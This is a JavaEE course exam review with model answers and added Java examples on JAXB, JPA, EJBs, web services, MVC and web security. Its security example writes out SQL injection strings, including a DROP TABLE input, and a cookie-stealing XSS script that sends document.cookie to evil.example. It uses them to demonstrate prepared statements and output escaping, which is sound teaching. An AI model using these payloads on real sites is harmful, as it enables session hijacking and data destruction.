The end
Carl Nettelblad
2015-06-04
The exam and end of the course
- Don't forget the course evaluation! It closes tomorrow, Friday.
- Project upload deadline tonight.
- Book presentation appointments with Kalyan.
The exam
- Correction has started.
- Easy to score some points, hard to nail everything.
- Frequently, specific questions posed in the exam text are simply not answered.
Question 1. The Java Architecture for XML Binding (JAXB) and the Java Persistence API (JPA) are two components in JavaEE. They are both used for interacting with other technologies outside of Java. Discuss the similarities between these components, their respective use (including which other JavaEE components rely on them), and how you can maintain a specified contract or schema against a non-Java user in the two cases. Also discuss what other components there are in JavaEE for interacting with the same external technologies, and compare them. (6p)
Answer 1
- Java Persistence API: database tables modelled as Java classes.
- Java Architecture for XML Binding: XML elements modelled as Java classes.
- Note the similarity?
- JAX-WS and JAX-RS rely on JAXB.
- JDBC is another option for database access (slightly more low-level; JPA implementations in fact tend to use JDBC underneath).
- Expected answer for other XML APIs: DOM, SAX, StAX. A lot of you mentioned XSLT; that is relevant, but a bit off the point.
- Both JPA and JAXB support:
  - generating classes from an existing schema (database structure or XSD file), and
  - generating a schema (SQL DDL statements or an XSD file) from annotated classes. The generated schema is the contract you hand to the non-Java side.
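As an added example (not from the lecture), one class carrying both JPA and JAXB annotations, followed by the XML and the XSD that JAXB produces from it. The class Coffee, its fields, the persistence unit name "coffeePU" and the javax.* APIs (Java EE 7, or the jaxb-api and persistence-api jars on newer JDKs) are assumptions of the example.

```java
// Coffee.java -- added example, not from the lecture. One class with both JPA
// and JAXB annotations, then the XML and XSD that JAXB produces from it. The
// class name, fields and the persistence unit name "coffeePU" are assumptions.
import java.io.IOException;
import java.io.StringWriter;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.Id;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Marshaller;
import javax.xml.bind.SchemaOutputResolver;
import javax.xml.bind.annotation.XmlRootElement;
import javax.xml.transform.Result;
import javax.xml.transform.stream.StreamResult;

@Entity           // JPA: every instance is a row in table COFFEE
@XmlRootElement   // JAXB: every instance is a <coffee> element
public class Coffee {
    @Id @GeneratedValue   // JPA: primary key generated by the database
    private Long id;
    private String name;
    private double price;

    public Coffee() { }   // both APIs require a public no-arg constructor

    public Long getId() { return id; }
    public void setId(Long id) { this.id = id; }
    public String getName() { return name; }
    public void setName(String name) { this.name = name; }
    public double getPrice() { return price; }
    public void setPrice(double price) { this.price = price; }
}

class SchemaDemo {
    public static void main(String[] args) throws JAXBException, IOException {
        JAXBContext ctx = JAXBContext.newInstance(Coffee.class);

        // Marshal one object: the same getters/setters JPA maps to columns
        // become child elements of <coffee>.
        Coffee c = new Coffee();
        c.setName("Espresso");
        c.setPrice(2.5);
        Marshaller m = ctx.createMarshaller();
        m.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, Boolean.TRUE);
        StringWriter xml = new StringWriter();
        m.marshal(c, xml);
        System.out.println(xml);

        // Generate the XSD: this is the contract a non-Java client validates
        // against, just as the DDL generated by JPA is the contract for the
        // database.
        final StringWriter xsd = new StringWriter();
        ctx.generateSchema(new SchemaOutputResolver() {
            @Override
            public Result createOutput(String namespaceUri, String suggestedFileName) {
                StreamResult result = new StreamResult(xsd);
                result.setSystemId(suggestedFileName);   // JAXB requires a system id
                return result;
            }
        });
        System.out.println(xsd);

        // JPA side (JPA 2.1): the equivalent DDL generation is requested in
        // persistence.xml for the unit "coffeePU" (name assumed):
        //   <property name="javax.persistence.schema-generation.scripts.action" value="create"/>
        //   <property name="javax.persistence.schema-generation.scripts.create-target" value="coffee.sql"/>
        // or from code with javax.persistence.Persistence.generateSchema("coffeePU", null).
    }
}
```

Run SchemaDemo with the JAXB jars on the classpath; no database is needed for the XML and XSD output, while the DDL side needs a persistence unit and a JDBC driver because JPA generates its schema through the database connection.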
Question 2
a) Configuration (the exam text said "Documentation") in JavaEE can frequently be stored in XML files, as well as in annotations. What is an annotation? Why would one choose one over the other in a JavaEE application? (2p)
b) We have also used annotations to define injection of specific resources. What is resource injection? Why would one choose to use resource injection over having something like the following in a program? (1p)

    import javax.annotation.PostConstruct;
    import javax.ejb.Stateless;
    import javax.naming.Context;
    import javax.naming.InitialContext;
    import javax.naming.NamingException;
    import javax.sql.DataSource;

    @Stateless
    public class DemoEjb implements DemoLocal {
        private DataSource ds = null;

        @PostConstruct
        public void initmethod() {
            try {
                // Manual JNDI lookup of the container-managed data source
                Context ctx = new InitialContext();
                ds = (DataSource) ctx.lookup("jdbc/fastCoffeeDB");
            } catch (NamingException e) {
                throw new IllegalStateException("Cannot look up jdbc/fastCoffeeDB", e);
            }
        }
        //...
    }
Answer 2
- Sorry about the documentation/configuration mix-up. No obvious effect on most answers.
- Most answers look like you read Configuration.
- A good answer assuming that it really should read Documentation will be respected.
Answer 2
- Annotations are specific additional meta-data added in a type-safe way to language elements (classes, methods, arguments, variables).
- Parsed and stored by the compiler (kept in the class file when declared with RUNTIME retention).
- Inspected at runtime (here: by the JavaEE container).
- The @ sign.
- A really short description is OK, but mentioning the @ sign or some example is almost required for full score, unless the theoretical description is very thorough.
Where to put configuration?
- Do you expect it to change, i.e. is it dependent on the specific container/server environment? Is it used by many classes? Put it in XML! (A deployment descriptor can also override what an annotation says, so environment-specific settings can be changed without recompiling.)
- Is it very specifically tied to the workings of the code? Put it in Java annotations.
Resource injection
- The code example is also an example of using a container-managed resource.
- Therefore, many answers relating to connection pools, why the container should manage resources etc. are correct, but somewhat off the point.
- The core aspect here is what we want to focus on in our code.
- Resource injection is a compact, declarative way to request a container-managed resource, allowing the container to manage dependencies. A single line shows the intent.
- The actual intent of retrieving the resource is much less clear in the example code in the exam.
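As an added example (not from the lecture) covering both the annotation question and the injection question: the exam's bean with the JNDI lookup replaced by one @Resource line, followed by a toy reflection-based injector showing what a container does with a RUNTIME-retained annotation. The DemoLocal interface, the ping() method, the hypothetical @Wire annotation and the MiniContainer class are assumptions; the JNDI name jdbc/fastCoffeeDB is the one from the exam.

```java
// DemoEjb.java -- added example, not from the lecture. The exam's bean with
// resource injection, then a toy injector showing what the container does with
// the annotation at runtime. DemoLocal, ping(), @Wire and MiniContainer are
// assumptions; jdbc/fastCoffeeDB is the name used in the exam text.
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
import java.lang.reflect.Field;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.Map;
import javax.annotation.Resource;
import javax.ejb.Local;
import javax.ejb.Stateless;
import javax.sql.DataSource;

@Local
interface DemoLocal {
    boolean ping() throws SQLException;
}

@Stateless
public class DemoEjb implements DemoLocal {
    // One declarative line replaces InitialContext, the cast and the checked
    // NamingException: the container resolves jdbc/fastCoffeeDB and assigns
    // the field before any business method runs. Because the name is
    // meta-data, a deployer can remap it in the deployment descriptor without
    // editing this code.
    @Resource(lookup = "jdbc/fastCoffeeDB")
    private DataSource ds;

    @Override
    public boolean ping() throws SQLException {
        try (Connection con = ds.getConnection()) {   // pooled; returned on close
            return con.isValid(1);
        }
    }
}

// What an annotation is, in miniature: meta-data the compiler keeps in the
// class file (RetentionPolicy.RUNTIME) so that a container can read it later.
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.FIELD)
@interface Wire {            // hypothetical stand-in for @Resource
    String lookup();
}

class MiniContainer {
    // Inspect the bean's fields for @Wire and assign the matching resource,
    // as the EJB container does for @Resource. jndi stands in for the real
    // naming context.
    static void inject(Object bean, Map<String, Object> jndi)
            throws IllegalAccessException {
        for (Field f : bean.getClass().getDeclaredFields()) {
            Wire w = f.getAnnotation(Wire.class);   // null when not annotated
            if (w == null) {
                continue;
            }
            Object resource = jndi.get(w.lookup());
            if (resource == null) {
                throw new IllegalStateException("No resource bound at " + w.lookup());
            }
            f.setAccessible(true);                   // private fields are injectable too
            f.set(bean, resource);
        }
    }
}
```

A call such as MiniContainer.inject(someBean, Collections.singletonMap("jdbc/fastCoffeeDB", someDataSource)) fills every @Wire field of someBean, which is the whole of what "the container manages the dependency" means: the bean states what it needs, and fails at deployment rather than at first use if the binding is missing.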
Question 3 In the servlet API, a servlet has to be reentrant. What does this mean, and what are the consequences? In the EJB API, it is stated that the bean classes do not have to be reentrant. How is concurrent access handled instead? Also, in this context, describe the difference between a stateless and a stateful session EJB. (4p)
Reentrant servlets
- Servlets are reentrant: the same instance is used to serve all requests.
- A method can be called to service a new request, on a new thread, while another request is being processed.
- What does this mean? Instance variables and other data are shared between concurrent requests, unless you use other means to store them (local variables, request attributes), and anything you deliberately share must be made thread-safe.
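As an added example (not from the lecture), a servlet showing the shared instance field a reentrant servlet must not rely on, and the thread-safe alternatives. The Servlet 3.0 API (javax.servlet), the URL /greet and the parameter name are assumptions of the example.

```java
// GreetServlet.java -- added example, not from the lecture. Servlet API 3.0
// assumed; the URL /greet and the "name" parameter are made up.
import java.io.IOException;
import java.util.concurrent.atomic.AtomicInteger;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet("/greet")
public class GreetServlet extends HttpServlet {

    // WRONG: one GreetServlet instance serves every request, so this field is
    // visible to all threads running doGet at the same time. Between the
    // assignment and the write to the response another request can overwrite
    // it, and user A is greeted with user B's name.
    private String currentName;

    // Deliberately shared state (a hit counter) is fine, but only if it is
    // thread-safe. A plain int here would lose increments under load.
    private final AtomicInteger hits = new AtomicInteger();

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        // The race in the wrong version:
        //   currentName = req.getParameter("name");
        //   ... work ...
        //   resp.getWriter().println("Hello " + currentName);

        // RIGHT: per-request data lives on this thread's stack (a local) or in
        // the request object, neither of which another request can see.
        String name = req.getParameter("name");
        if (name == null || !name.matches("[A-Za-z ]{1,40}")) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "name required");
            return;
        }
        req.setAttribute("greeting", "Hello " + name);

        int n = hits.incrementAndGet();

        // Session attributes are per user, but two concurrent requests from the
        // same browser (two tabs) still share them; treat them like the field
        // above, not like a local.
        req.getSession().setAttribute("lastName", name);

        resp.setContentType("text/plain;charset=UTF-8");
        resp.getWriter().println(req.getAttribute("greeting") + " (request #" + n + ")");
    }
    // The deprecated SingleThreadModel interface does not fix this: it only
    // serialises access to one instance and leaves static and session state shared.
}
```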
Non-reentrant EJBs
- EJBs are not reentrant (unless you go to some length to explicitly ask for it, e.g. a singleton session bean with container-managed locking).
- Instead, many instances are created.
- These can be shared in pools, but only a single client (object using the EJB) is using a specific instance at any single time: only a single method call is going on.
- For stateless EJBs, the ownership by the client starts and ends with every single method call.
- For stateful EJBs, the same instance is locked to a specific client from the time it is retrieved until it goes out of context.
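As an added example (not from the lecture), three session beans: a stateless bean that must not keep per-client state, a stateful bean that does, and the singleton variant the "go to some length" remark refers to. Each would be its own source file; class names, prices and the EJB 3.1 API (javax.ejb) are assumptions of the example.

```java
// Three bean classes, shown together -- added example, not from the lecture.
// Each belongs in its own file; class names and prices are made up.
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import javax.ejb.Lock;
import javax.ejb.LockType;
import javax.ejb.Remove;
import javax.ejb.Singleton;
import javax.ejb.Stateful;
import javax.ejb.Stateless;

// ---- PriceService.java
@Stateless
public class PriceService {
    // WRONG for a stateless bean: the container may hand the client a
    // different pooled instance on every call, so a value stored here during
    // one call is not reliably there in the next, and may have been written
    // by another client.
    // private String lastQuoted;

    public double priceOf(String name) {
        // Every call is complete on its own; the instance is free for another
        // client the moment this method returns.
        return "espresso".equals(name) ? 2.5 : 3.0;
    }
}

// ---- ShoppingCart.java
@Stateful
public class ShoppingCart {
    // Correct here: this instance belongs to one client from lookup until
    // @Remove or timeout. The container serialises concurrent calls on it
    // (or, with @AccessTimeout, rejects them with ConcurrentAccessException),
    // so there is no data race on this list.
    private final List<String> items = new ArrayList<>();

    public void add(String name) { items.add(name); }

    public List<String> items() { return new ArrayList<>(items); }

    @Remove  // after this call the container discards the instance
    public List<String> checkout() { return items(); }
}

// ---- Inventory.java
@Singleton
public class Inventory {
    // One instance for the whole application, so it IS shared between clients.
    // Container-managed concurrency: readers run in parallel, writers alone.
    private final Map<String, Integer> stock = new ConcurrentHashMap<>();

    @Lock(LockType.READ)
    public int left(String name) { return stock.getOrDefault(name, 0); }

    @Lock(LockType.WRITE)
    public void restock(String name, int n) { stock.merge(name, n, Integer::sum); }
}
```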
Question 4 What is a web service? Web services are designed to be independent of language, technology vendor, and platform. How is this achieved? What is the difference between SOAP-based and RESTful web services? How are web services handled in JavaEE? (4p)
Answer 4
- Web services: providing programmatic access to data and services in our application. Other code talking to our code over the Internet.
- SOAP
  - A general way to send synchronous messages: basically stateless method calls.
  - HTTP is one of many possible transports.
  - Typically XML formatting of messages, with rather verbose syntax.
  - Multiple services (operations) provided through one endpoint (URL).
Answer 4
- SOAP: the interface of the endpoint is defined by a WSDL document.
- REST
  - Uses the basic verbs of HTTP (GET, POST, PUT, DELETE).
  - The URL represents the request (combined with the request content); different objects have different URLs.
  - Frequently JSON or XML data, just representing the object itself.
  - No really general schema definition; the representations are self-explaining instead.
Answer 4
- JAX-WS (SOAP) and JAX-RS (REST) are used to provide and interact with web services in JavaEE. Both rely on JAXB for the XML binding.
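As an added example (not from the lecture), the same price lookup exposed twice: as a SOAP endpoint with JAX-WS and as a REST resource with JAX-RS, both serialising the same JAXB-annotated class. Three source files are shown together; class names, paths, prices, and the availability of a JSON provider in the JAX-RS runtime are assumptions of the example.

```java
// Three files shown together -- added example, not from the lecture.
// Class names, URL paths and prices are made up.

// ---- Coffee.java: the JAXB binding used by both endpoints
import javax.xml.bind.annotation.XmlRootElement;

@XmlRootElement
public class Coffee {
    public String name;
    public double price;
    public Coffee() { }
    public Coffee(String name, double price) { this.name = name; this.price = price; }
}

// ---- CoffeeSoapService.java: JAX-WS. The container publishes the endpoint and
// generates its WSDL (typically at <endpoint URL>?wsdl, server dependent); the
// WSDL, not the Java code, is the contract a non-Java client codes against.
import javax.jws.WebMethod;
import javax.jws.WebParam;
import javax.jws.WebService;

@WebService
public class CoffeeSoapService {
    @WebMethod
    public Coffee priceOf(@WebParam(name = "name") String name) {
        // A SOAP operation is a stateless method call; every operation of this
        // class is reached through the one endpoint URL.
        return new Coffee(name, "espresso".equals(name) ? 2.5 : 3.0);
    }
}

// ---- CoffeeResource.java: JAX-RS. The URL identifies the object, the HTTP
// verb says what to do with it, and the body is the object itself.
import java.net.URI;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import javax.ws.rs.ApplicationPath;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.NotFoundException;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.Application;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.Response;

@ApplicationPath("/api")
public class RestApp extends Application { }   // mounts all resources under /api

@Path("/coffees")
public class CoffeeResource {
    private static final Map<String, Double> PRICES = new ConcurrentHashMap<>();
    static { PRICES.put("espresso", 2.5); }

    @GET
    @Path("{name}")                      // GET /api/coffees/espresso
    @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
    public Coffee get(@PathParam("name") String name) {
        Double p = PRICES.get(name);
        if (p == null) {
            throw new NotFoundException();   // plain HTTP 404, not a SOAP fault
        }
        return new Coffee(name, p);          // serialised by JAXB (or a JSON provider)
    }

    @POST                                // POST /api/coffees with a <coffee> body
    @Consumes({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
    public Response add(Coffee c) {
        if (c.name == null || c.price < 0) {
            return Response.status(Response.Status.BAD_REQUEST).build();
        }
        PRICES.put(c.name, c.price);
        return Response.created(URI.create("/api/coffees/" + c.name)).build();
    }
}
```

Note what the client sees in each case: the SOAP client downloads the WSDL and generates a stub for priceOf; the REST client only needs to know the URL pattern and the media type, and reads the status code for errors.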
Question 5 The model-view-controller paradigm is a common way to design and look at web applications. Using JSP, servlets and (possibly Enterprise Java) beans, what is the role of each component in this paradigm? What kind of code/logic would you ideally want to have on each level? How could you use JSF instead?
Answer 5
- Model-view-controller: a crucial architectural concept in the course!
- Model: the world and what can happen in the world.
  - Implemented as beans.
  - Not only containing data, but also the actions we can take on the data: create objects, modify objects, delete objects in different ways.
Answer 5
- View: presents the actual HTML pages to the user.
  - In JSP, try to use very few scriptlets; stick to EL and JSTL.
  - Presents the information stored in the beans served by the controller.
Controller
- Servlet
  - Parsing requests.
  - Calling the model.
  - Populating state from the model into contexts (request, session).
  - Directing rendering to the correct view.
- Rules of thumb
  - Keep actions that modify data out of views.
  - Keep external resources out of the controller.
  - Keep explicit HTML out of the model, ideally out of the controller as well.
JSF instead
- JSF is a general, modularized framework for multiple HTTP request/response interactions within the same view.
- The controller is managed by the JSF servlet (FacesServlet).
- View actions can map directly to bean action methods.
- Control flow is also defined by navigation rules.
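As an added example (not from the lecture), one request handled MVC-style with a bean as model, a servlet as controller and a JSP as view, following the rules of thumb above: the view never modifies data, the controller holds no HTML, and the model knows nothing about HTTP. Two Java files and the JSP (shown as a comment) are given together; class names, URLs and the Servlet 3.0 and JSTL APIs are assumptions of the example.

```java
// Two files plus the JSP view -- added example, not from the lecture.
// Class names and URLs are made up.

// ---- CoffeeCatalog.java: the model. Data plus the actions allowed on it;
// no HTML and no HttpServletRequest in here.
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

public class CoffeeCatalog {
    private final Map<String, Double> prices = new ConcurrentHashMap<>();

    public CoffeeCatalog() { prices.put("espresso", 2.5); }

    public Double priceOf(String name) { return prices.get(name); }

    public void setPrice(String name, double price) {
        if (price < 0) {
            throw new IllegalArgumentException("negative price");
        }
        prices.put(name, price);
    }
}

// ---- CoffeeController.java: the controller. Parses the request, calls the
// model, puts the result in a context and forwards to the view. Modifying
// actions are only accepted via POST and answered with a redirect, so the
// view never changes data and a browser reload never repeats the change.
import java.io.IOException;
import java.net.URLEncoder;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet("/coffee")
public class CoffeeController extends HttpServlet {
    private final CoffeeCatalog catalog = new CoffeeCatalog();   // shared, thread-safe model

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String name = req.getParameter("name");
        Double price = name == null ? null : catalog.priceOf(name);
        req.setAttribute("name", name);
        req.setAttribute("price", price);
        // The view lives under WEB-INF so it can only be reached through the controller.
        req.getRequestDispatcher("/WEB-INF/coffee.jsp").forward(req, resp);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String name = req.getParameter("name");
        String price = req.getParameter("price");
        if (name == null || price == null) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "name and price required");
            return;
        }
        try {
            catalog.setPrice(name, Double.parseDouble(price));
        } catch (IllegalArgumentException e) {   // includes NumberFormatException
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "bad price");
            return;
        }
        resp.sendRedirect(req.getContextPath() + "/coffee?name="
                          + URLEncoder.encode(name, "UTF-8"));
    }
}

/* ---- WEB-INF/coffee.jsp: the view. EL and JSTL only, no scriptlets; c:out
   escapes the user-supplied name so it is displayed, not interpreted.
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
<html><body>
<c:choose>
  <c:when test="${empty price}"><p>No price for <c:out value="${name}"/></p></c:when>
  <c:otherwise><p><c:out value="${name}"/> costs ${price}</p></c:otherwise>
</c:choose>
<form method="post" action="${pageContext.request.contextPath}/coffee">
  <input name="name"/> <input name="price"/> <input type="submit" value="Set price"/>
</form>
</body></html>
*/
```

With JSF the controller part disappears from your code: the form's action would reference a bean method (for instance #{catalogBean.setPrice}), FacesServlet does the parsing and the forwarding, and the redirect target comes from a navigation rule rather than from sendRedirect.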
Question 6 a) A web application developer can easily create SQL injection and cross-site scripting problems. Describe what these are and how you can avoid them. Why would the JSTL tag c:out be relevant in this? (2p) b) We talk about programmatic versus declarative security. What do we mean by this, and how can the container help us in maintaining authentication and authorization? Why should the full session, not only the login process, be encrypted - even if the information itself is not sensitive? (4p)
Answer 6
- SQL injection: adding (unverified) data into a SQL command.
  - Can result in data being parsed as SQL code, by data including apostrophes etc.
  - Can result in data loss, data being exposed, data being modified, or exploits of other parts of the system.
- Avoided by
  - prepared statements/parametrized queries (or stored procedures, if those are called in a safe manner!), or
  - escaping any dangerous characters or character combinations (not preferable).
Cross-site scripting (XSS)
- Input from a user or another website being run as a script or interpreted as HTML in the context of your website.
- Example scenario: an unvalidated comment form on a news post.
- Result: arbitrary code/script being run in the context of the user's web browser. It can access cookies and can redraw the web page to give the impression of the user doing something else than what is really happening.
- Only client-side, but if the exploit affects an admin user, your whole application can be threatened.
Cross-site scripting
- Avoid it by
  - validating all input, and
  - escaping output.
- The c:out tag has escaping active by default (escapeXml="true"), i.e. the string <script> would be rendered as &lt;script&gt;, which the browser displays as text instead of executing.
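As an added example (not from the lecture) for both parts of question 6a: the SQL injection bug beside its prepared-statement fix, and the output escaping c:out performs beside an input validation check. The table and column names are made up, and escapeXml is this example's reimplementation of what JSTL's c:out does with escapeXml="true", not JSTL's own code.

```java
// InjectionDemo.java -- added example, not from the lecture. Table and column
// names are made up; escapeXml mirrors what JSTL's c:out does by default.
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class InjectionDemo {

    // VULNERABLE: the name is concatenated into the command, so the input
    //   ' OR '1'='1
    // turns the query into  ... WHERE name = '' OR '1'='1'  and returns every
    // row, and  '; DROP TABLE coffee; --  does worse where the driver allows
    // several statements in one call.
    public static Double priceUnsafe(Connection con, String name) throws SQLException {
        String sql = "SELECT price FROM coffee WHERE name = '" + name + "'";
        try (Statement st = con.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            return rs.next() ? rs.getDouble("price") : null;
        }
    }

    // FIXED: a prepared statement sends the command and the data separately;
    // the database never parses the name as SQL, apostrophes included.
    // (Escaping the quote characters instead is the "not preferable"
    // alternative: it has to be exactly right for every database and charset.)
    public static Double priceSafe(Connection con, String name) throws SQLException {
        try (PreparedStatement ps =
                 con.prepareStatement("SELECT price FROM coffee WHERE name = ?")) {
            ps.setString(1, name);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getDouble("price") : null;
            }
        }
    }

    // XSS, output side: what c:out does before writing user data into HTML.
    // The five characters JSTL escapes are the ones that can change the
    // structure of the document (tags, attribute delimiters, entities).
    public static String escapeXml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '\'': out.append("&#039;"); break;
                case '"':  out.append("&#034;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // XSS, input side: validation. A comment on a news post never legitimately
    // needs a tag, so reject rather than try to clean it up.
    public static boolean isAcceptableComment(String s) {
        return s != null && s.length() <= 1000 && !s.matches("(?s).*[<>].*");
    }

    public static void main(String[] args) {
        // Constructed sample: a cookie-stealing comment such as an attacker would post.
        String payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>";
        System.out.println(escapeXml(payload));
        System.out.println(isAcceptableComment(payload));
        System.out.println(isAcceptableComment("Great coffee, 5/5"));
    }
}
```

Both defences are needed: validation stops the obvious payload at the form, escaping protects every place the stored text is later rendered, including pages written by someone who forgot the data came from a user.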
Programmatic and declarative security
- Declarative security
  - You specify what pages to protect.
  - The container maintains specific roles.
  - Even EJB methods can be protected based on such roles.
  - Form-based and other authentication methods.
- Programmatic security
  - The developer maintains security: the code checks if the user identity is appropriate for a specific action.
  - However, you can ask the container to authenticate programmatically.
- In short: you can use container-based authentication even if you have programmatic authorization.
Programmatic and declarative security
- As in many other cases in the course: if a declarative approach matches what you want to do, it is probably the safer and clearer way to do it.
  - Fewer things that can go wrong (in your code).
  - Relying more on code already written and tested by others.
  - Clearer to a future person who is going to implement changes.
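As an added example (not from the lecture), the rule "only admins may change prices" stated declaratively for a servlet and for an EJB, and then the programmatic form that still lets the container do the authentication. Three source files are shown together; the role name, URLs, class names, and the Servlet 3.0 and Java EE 6 security annotations are assumptions of the example, and the user store itself is whatever realm the container is configured with.

```java
// Three files shown together -- added example, not from the lecture.
// Role, URLs and class names are made up.

// ---- AdminServlet.java: declarative. The container authenticates (using the
// login-config in web.xml, e.g. FORM) and answers 403 before doGet runs if the
// caller lacks the role; there is no check to forget in the code.
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.annotation.HttpConstraint;
import javax.servlet.annotation.ServletSecurity;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet("/admin/prices")
@ServletSecurity(@HttpConstraint(rolesAllowed = "admin"))
public class AdminServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        // Non-null here: the constraint guarantees an authenticated admin.
        resp.getWriter().println("Hello " + req.getUserPrincipal().getName());
    }
}

// ---- PriceAdmin.java: declarative on an EJB. The same role names, checked
// again on every business method regardless of which servlet or client calls.
import javax.annotation.security.PermitAll;
import javax.annotation.security.RolesAllowed;
import javax.ejb.Stateless;

@Stateless
public class PriceAdmin {
    @PermitAll
    public double priceOf(String name) { return 2.5; }

    @RolesAllowed("admin")
    public void setPrice(String name, double price) { /* update the catalog */ }
}

// ---- LoginServlet.java (imports as in AdminServlet.java): programmatic
// authorization with container authentication. The container still holds the
// users, verifies the password and tracks the login; the code only decides
// what that identity may do.
@WebServlet("/login")
public class LoginServlet extends HttpServlet {
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String user = req.getParameter("user");
        String pw = req.getParameter("password");
        try {
            req.login(user, pw);               // ask the container to authenticate
        } catch (ServletException e) {         // thrown on failed authentication
            resp.sendError(HttpServletResponse.SC_UNAUTHORIZED, "login failed");
            return;
        }
        // Hand-written authorization. Every servlet that needs it must repeat
        // this, which is why the declarative form is preferred when it fits.
        if (req.isUserInRole("admin")) {
            resp.sendRedirect(req.getContextPath() + "/admin/prices");
        } else {
            resp.sendRedirect(req.getContextPath() + "/coffee");
        }
    }
}
```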
All-HTTPS
- Why would we want to encrypt login? To protect the user name and password. That alone can also be done with hashes over a clear channel (digest-style authentication).
- Why would we want to stay logged in? The user gets a cookie identifying the session, and every single request contains that cookie.
- Gaining access to the user's account is then just a matter of capturing that cookie over an unencrypted session. So the whole session must be encrypted, and the session cookie should be marked Secure so that the browser never sends it over plain HTTP at all.
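As an added example (not from the lecture), the three places where "all HTTPS" has to be enforced in a Servlet 3.0 application: the session cookie's flags, a filter that refuses plain-HTTP requests for every URL, and the header that tells the browser not to try HTTP again. Two source files are shown together; class names are made up, and the filter assumes TLS terminates in the container itself (behind a TLS-offloading proxy, isSecure() would have to be derived from the proxy's headers instead).

```java
// Two files shown together -- added example, not from the lecture.
// Class names are made up; Servlet 3.0 API assumed.
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.SessionCookieConfig;
import javax.servlet.annotation.WebFilter;
import javax.servlet.annotation.WebListener;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// ---- SessionCookieSetup.java
// 1. The session cookie itself. Secure: the browser never sends it over plain
//    HTTP, so one stray http:// link or image on the site cannot leak it.
//    HttpOnly: script in the page (the XSS case) cannot read it either.
@WebListener
public class SessionCookieSetup implements ServletContextListener {
    @Override
    public void contextInitialized(ServletContextEvent sce) {
        SessionCookieConfig cc = sce.getServletContext().getSessionCookieConfig();
        cc.setSecure(true);
        cc.setHttpOnly(true);
        // Equivalent web.xml:
        //   <session-config><cookie-config>
        //     <secure>true</secure><http-only>true</http-only>
        //   </cookie-config></session-config>
    }

    @Override
    public void contextDestroyed(ServletContextEvent sce) { }
}

// ---- HttpsOnlyFilter.java
// 2. Every request, not just the login form. Anything that arrived over plain
//    HTTP is bounced to the same URL over HTTPS before any servlet sees it.
//    The declarative equivalent is a <user-data-constraint> with
//    <transport-guarantee>CONFIDENTIAL</transport-guarantee> on /* in web.xml.
@WebFilter("/*")
public class HttpsOnlyFilter implements Filter {
    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        if (!req.isSecure()) {
            StringBuilder url = new StringBuilder("https://")
                .append(req.getServerName()).append(req.getRequestURI());
            if (req.getQueryString() != null) {
                url.append('?').append(req.getQueryString());
            }
            // 301 so browsers and bookmarks stop asking for http:// at all.
            // Note that a POST body is lost here; a plain-HTTP POST should
            // never have been made in the first place.
            resp.setStatus(HttpServletResponse.SC_MOVED_PERMANENTLY);
            resp.setHeader("Location", url.toString());
            return;
        }
        // 3. HSTS: tell the browser to use HTTPS for this host for a year, so
        //    even the first request of the next visit is not sent in clear.
        resp.setHeader("Strict-Transport-Security", "max-age=31536000");
        chain.doFilter(request, response);
    }

    @Override public void init(FilterConfig fc) { }
    @Override public void destroy() { }
}
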